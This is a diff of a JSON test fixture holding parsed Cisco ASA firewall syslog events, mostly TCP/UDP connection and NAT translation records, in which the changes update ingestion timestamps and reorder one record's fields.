+ "ingested": "2021-12-14T14:37:05.575508913Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8482,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604331100Z", + "ingested": "2021-12-14T14:37:05.575509267Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", 
@@ -8561,7 +8561,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604336500Z", + "ingested": "2021-12-14T14:37:05.575509604Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8647,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604341800Z", + "ingested": "2021-12-14T14:37:05.575509952Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8729,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604347600Z", + "ingested": "2021-12-14T14:37:05.575510281Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8808,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604353Z", + "ingested": "2021-12-14T14:37:05.575510612Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8894,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604358700Z", + "ingested": "2021-12-14T14:37:05.575511091Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", 
@@ -8976,7 +8976,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604364100Z", + "ingested": "2021-12-14T14:37:05.575512041Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +9055,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604369400Z", + "ingested": "2021-12-14T14:37:05.575512413Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9141,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604374800Z", + "ingested": "2021-12-14T14:37:05.575512756Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9226,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604380200Z", + "ingested": "2021-12-14T14:37:05.575513090Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9308,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604385600Z", + "ingested": "2021-12-14T14:37:05.575513417Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", 
@@ -9387,7 +9387,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604390900Z", + "ingested": "2021-12-14T14:37:05.575513909Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9473,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604396300Z", + "ingested": "2021-12-14T14:37:05.575514241Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9555,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604401900Z", + "ingested": "2021-12-14T14:37:05.575514577Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9634,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604405700Z", + "ingested": "2021-12-14T14:37:05.575514914Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9717,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604410Z", + "ingested": "2021-12-14T14:37:05.575515323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", 
@@ -9796,7 +9796,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604414900Z", + "ingested": "2021-12-14T14:37:05.575515686Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9879,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604419500Z", + "ingested": "2021-12-14T14:37:05.575516037Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9958,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604423Z", + "ingested": "2021-12-14T14:37:05.575516374Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +10041,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604427300Z", + "ingested": "2021-12-14T14:37:05.575516712Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +10120,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604432700Z", + "ingested": "2021-12-14T14:37:05.575517048Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", 
@@ -10206,7 +10206,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604438Z", + "ingested": "2021-12-14T14:37:05.575517379Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10291,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604441500Z", + "ingested": "2021-12-14T14:37:05.575517707Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10376,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604445300Z", + "ingested": "2021-12-14T14:37:05.575518036Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10458,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604448600Z", + "ingested": "2021-12-14T14:37:05.575518368Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10537,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604452800Z", + "ingested": "2021-12-14T14:37:05.575518704Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", 
@@ -10620,7 +10620,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604458200Z", + "ingested": "2021-12-14T14:37:05.575519048Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10699,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604463600Z", + "ingested": "2021-12-14T14:37:05.575519398Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10785,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604468900Z", + "ingested": "2021-12-14T14:37:05.575519729Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10867,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604474300Z", + "ingested": "2021-12-14T14:37:05.575520057Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10946,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604479600Z", + "ingested": "2021-12-14T14:37:05.575520383Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", 
@@ -11032,7 +11032,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604484900Z", + "ingested": "2021-12-14T14:37:05.575520713Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +11117,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604490400Z", + "ingested": "2021-12-14T14:37:05.575521045Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11200,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604495800Z", + "ingested": "2021-12-14T14:37:05.575521400Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11283,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604501200Z", + "ingested": "2021-12-14T14:37:05.575521733Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11362,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604506500Z", + "ingested": "2021-12-14T14:37:05.575522067Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", 
@@ -11447,7 +11447,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604511800Z", + "ingested": "2021-12-14T14:37:05.575522394Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11530,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604517200Z", + "ingested": "2021-12-14T14:37:05.575522743Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11615,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604522600Z", + "ingested": "2021-12-14T14:37:05.575523075Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11697,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604528Z", + "ingested": "2021-12-14T14:37:05.575523424Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604533300Z", + "ingested": "2021-12-14T14:37:05.575523760Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", 
@@ -11862,7 +11862,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604538700Z", + "ingested": "2021-12-14T14:37:05.575524093Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs", "code": "302014", "kind": "event", @@ -11947,7 +11947,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604544200Z", + "ingested": "2021-12-14T14:37:05.575524413Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs", "code": "302014", "kind": "event", @@ -12030,7 +12030,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604548100Z", + "ingested": "2021-12-14T14:37:05.575524745Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12115,7 +12115,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604552400Z", + "ingested": "2021-12-14T14:37:05.575525072Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -12197,7 +12197,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604557100Z", + "ingested": "2021-12-14T14:37:05.575525405Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294", "code": "305011", "kind": "event", 
@@ -12276,7 +12276,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604561700Z", + "ingested": "2021-12-14T14:37:05.575525751Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)", "code": "302013", "kind": "event", @@ -12361,7 +12361,7 @@ "event": { "severity": 6, "duration": 3526000000000, - "ingested": "2021-12-09T13:32:20.604565200Z", + "ingested": "2021-12-14T14:37:05.575526081Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512", "code": "302016", "kind": "event", @@ -12385,22 +12385,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -12410,12 +12404,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604569800Z", + "ingested": "2021-12-14T14:37:05.575526416Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30", "code": "305012", "kind": "event", @@ -12429,7 +12426,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -12491,7 +12491,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604575300Z", + "ingested": "2021-12-14T14:37:05.575526745Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12575,7 +12575,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604580300Z", + "ingested": "2021-12-14T14:37:05.575527096Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12660,7 +12660,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604583800Z", + "ingested": "2021-12-14T14:37:05.575527427Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168", "code": "302016", "kind": "event", @@ -12743,7 +12743,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604588Z", + "ingested": "2021-12-14T14:37:05.575527758Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -12828,7 +12828,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604591500Z", + "ingested": "2021-12-14T14:37:05.575528092Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198", "code": "302016", "kind": "event", 
@@ -12912,7 +12912,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604596200Z", + "ingested": "2021-12-14T14:37:05.575528437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -12995,7 +12995,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604601500Z", + "ingested": "2021-12-14T14:37:05.575528773Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13080,7 +13080,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604605800Z", + "ingested": "2021-12-14T14:37:05.575529109Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84", "code": "302016", "kind": "event", @@ -13162,7 +13162,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604611100Z", + "ingested": "2021-12-14T14:37:05.575529440Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295", "code": "305011", "kind": "event", @@ -13241,7 +13241,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604616500Z", + "ingested": "2021-12-14T14:37:05.575529766Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)", "code": "302013", "kind": "event", 
@@ -13325,7 +13325,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604622100Z", + "ingested": "2021-12-14T14:37:05.575530284Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -13410,7 +13410,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604627500Z", + "ingested": "2021-12-14T14:37:05.575530674Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188", "code": "302016", "kind": "event", @@ -13492,7 +13492,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604633100Z", + "ingested": "2021-12-14T14:37:05.575530999Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296", "code": "305011", "kind": "event", @@ -13571,7 +13571,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604638500Z", + "ingested": "2021-12-14T14:37:05.575531334Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", @@ -13654,7 +13654,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604643800Z", + "ingested": "2021-12-14T14:37:05.575531665Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", 
@@ -13733,7 +13733,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604649200Z", + "ingested": "2021-12-14T14:37:05.575531999Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", @@ -13816,7 +13816,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604654600Z", + "ingested": "2021-12-14T14:37:05.575532321Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", @@ -13895,7 +13895,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604659900Z", + "ingested": "2021-12-14T14:37:05.575533137Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", @@ -13981,7 +13981,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604665300Z", + "ingested": "2021-12-14T14:37:05.575533562Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", @@ -14063,7 +14063,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604670700Z", + "ingested": "2021-12-14T14:37:05.575533902Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", 
@@ -14142,7 +14142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604676200Z", + "ingested": "2021-12-14T14:37:05.575534242Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", @@ -14225,7 +14225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604681600Z", + "ingested": "2021-12-14T14:37:05.575534588Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", @@ -14304,7 +14304,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604687100Z", + "ingested": "2021-12-14T14:37:05.575534915Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", @@ -14390,7 +14390,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604690900Z", + "ingested": "2021-12-14T14:37:05.575535255Z", "original": "Oct 10 2018 